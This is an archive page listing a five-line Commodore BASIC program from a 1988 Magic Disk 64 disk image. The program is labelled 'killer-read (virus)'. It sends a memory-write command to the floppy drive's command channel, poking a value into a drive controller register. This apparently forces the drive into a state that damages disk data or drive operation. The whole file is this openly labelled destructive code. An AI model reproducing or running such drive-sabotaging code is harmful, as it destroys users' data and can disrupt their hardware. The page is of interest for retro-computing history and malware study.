home *** CD-ROM | disk | FTP | other *** search
/ Magic Disk 64 / Magic_Disk_64_88-03_1988_-_de_Side_B.d64 / killer-read (.txt) < prev    next >
Commodore BASIC  |  2023-02-26  |  94b  |  5 lines

  1. 0 rem >> killer-read (virus) <<
  2. 1 open1,8,15
  3. 2 print#1,"m-w";chr$(12);chr$(28);chr$(1);chr$(200)
  4. 3 close1
  5.